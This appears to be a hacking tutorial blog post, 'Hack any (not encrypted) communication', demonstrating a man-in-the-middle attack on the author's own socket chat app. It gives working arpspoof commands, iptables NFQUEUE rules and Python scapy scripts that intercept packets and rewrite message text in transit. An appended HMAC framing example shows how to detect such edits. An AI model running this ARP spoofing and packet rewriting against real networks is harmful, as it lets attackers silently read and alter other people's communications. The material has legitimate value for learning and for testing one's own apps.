Hack any (not encrypted) communication
Modifying data in transit is one of the simplest ways to hack an app. For example, I created an app that communicates with a server via sockets so the two can exchange messages.
As a natural course of action, I also created a server.
If we type in the IP and press the “connect” button, we will see a message sent by the server.
From the server’s point of view, we will see a message sent by the client.
Unfortunately for us, Burp Suite doesn’t see this as WebSocket or HTTP/HTTPS communication.
However, let’s not give up on that just yet. We can edit network packets that pass through our machine. To enable forwarding, run:

```
sysctl -w net.ipv4.ip_forward=1
```
Now we have to convince our chosen target device to send its packets via our machine. Some ways to do that:
- ARP spoofing
- Set our Linux box as the target’s gateway
- Connect the device through an access point hosted on our Linux box
I prefer ARP spoofing because the target, the server and our machine are on the same network.

```
arpspoof -i eth0 192.168.1.171 -t 192.168.1.250
arpspoof -i eth0 -t 192.168.1.171 192.168.1.250
```
Now we can send a request from the app and we will see the packet in Wireshark with the message from the client:
And also from the server:
It’s clear that all we need to do is edit this packet, and that isn’t difficult either. First, we need to queue the packets so that we are able to edit them:

```
iptables -I FORWARD -j NFQUEUE --queue-num 0
```

If the app runs on your own device, use these commands instead to queue local (not forwarded) packets:

```
iptables -I INPUT -j NFQUEUE --queue-num 0
iptables -I OUTPUT -j NFQUEUE --queue-num 0
```

To remove these rules again, use:

```
iptables --flush
```
Now, if we make a request in the app, the app will hang, because the packet will not be transmitted to the server.
At this point, it’s time for some Python. Below are a handful of lines that let us watch what we are able to edit. Incidentally, this lets us edit many kinds of packets, for example DNS packets, HTTP requests, etc.

```python
import scapy.all as scapy
import netfilterqueue


def handle_packet(packet):  # callback for every queued packet
    sp = scapy.IP(packet.get_payload())  # parse the raw bytes into a scapy IP packet
    sp.show()  # print what is in the packet
    packet.accept()  # release the packet from the queue and let it through


# bind to queue 0 (the --queue-num from iptables) and handle packets with handle_packet
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, handle_packet)
queue.run()
```
After running the Python script and making a request in the app, we can find the packets we want to edit.
If you don’t have the needed dependencies, you can install them with:

```
pip3 install scapy
apt install python3-pip git libnfnetlink-dev libnetfilter-queue-dev
pip3 install -U git+https://github.com/kti/python-netfilterqueue
```
So, it’s time to write more evil lines that actually edit packets. For example, here is code that rewrites the “load” if the packet contains “Test Message”.

```python
import scapy.all as scapy
import netfilterqueue


def handle_packet(packet):  # callback for every queued packet
    sp = scapy.IP(packet.get_payload())  # parse the raw bytes into a scapy IP packet
    if sp.haslayer(scapy.Raw):  # only packets with a payload are interesting
        try:
            load = sp[scapy.Raw].load.decode("utf-8")  # decode message from bytes
        except UnicodeDecodeError:  # binary payload: leave the packet untouched
            packet.accept()
            return
        if "Test Message" in load:  # check whether the payload contains “Test Message”
            print("Changing message: " + load.replace("\n", ""))  # message before the change
            load = load.replace("Test Message", "Hacked Msg")  # replace “Test Message” with “Hacked Msg”
            print("To message: " + load.replace("\n", "") + "\n")  # message after the change
            sp[scapy.Raw].load = load.encode("utf-8")  # encode message back to bytes
            del sp[scapy.IP].len  # delete so scapy recalculates it
            del sp[scapy.IP].chksum  # delete so scapy recalculates it
            del sp[scapy.TCP].chksum  # delete so scapy recalculates it
            packet.set_payload(bytes(sp))  # write the modified packet back
    packet.accept()  # release the packet from the queue and let it through


# bind to queue 0 (the --queue-num from iptables) and handle packets with handle_packet
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, handle_packet)
queue.run()
```
After running the new script, requests change from “Test Message…” to “Hacked Msg…”. This is visible in our script, in the application and on the server.
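The edit above works only because the app sends bare, unauthenticated text. As an added example (not code from the original article or its app), here is the receiver-side check that makes such a rewrite detectable: each message is framed with its length and an HMAC-SHA256 tag over a shared key, so a substituted body, whether the same length or a different one, fails verification and is dropped. The key and the `tamper()` helper are constructed for the demo.

```python
import hmac
import hashlib
import struct

# Constructed demo key. A real app would derive it from a proper key exchange,
# or simply use TLS, which provides this integrity check for free.
KEY = b"constructed-demo-key-do-not-reuse"
TAG_LEN = 32  # HMAC-SHA256 output size in bytes


def frame(message: str, key: bytes = KEY) -> bytes:
    """Build an authenticated frame: 2-byte length, UTF-8 body, HMAC-SHA256 tag.
    The length header is covered by the tag, so resizing the body is detected too."""
    body = message.encode("utf-8")
    header = struct.pack("!H", len(body))
    tag = hmac.new(key, header + body, hashlib.sha256).digest()
    return header + body + tag


def parse(data: bytes, key: bytes = KEY):
    """Return the verified message, or None if the frame is malformed or the tag
    does not match; the receiver must then discard the message."""
    if len(data) < 2 + TAG_LEN:
        return None
    (body_len,) = struct.unpack("!H", data[:2])
    body = data[2:2 + body_len]
    tag = data[2 + body_len:2 + body_len + TAG_LEN]
    if len(body) != body_len or len(tag) != TAG_LEN:
        return None  # truncated or resized frame
    expected = hmac.new(key, data[:2] + body, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):  # constant-time comparison
        return None  # body was altered in transit
    return body.decode("utf-8")


def tamper(data: bytes) -> bytes:
    """Mimic the on-path edit from the article: rewrite the text of the body.
    The script in the article sees only the TCP payload, never the key."""
    return data.replace(b"Test Message", b"Hacked Msg")


if __name__ == "__main__":
    wire = frame("Test Message from client")
    print("intact   ->", parse(wire))          # the original message
    print("tampered ->", parse(tamper(wire)))  # None: rejected by the receiver
```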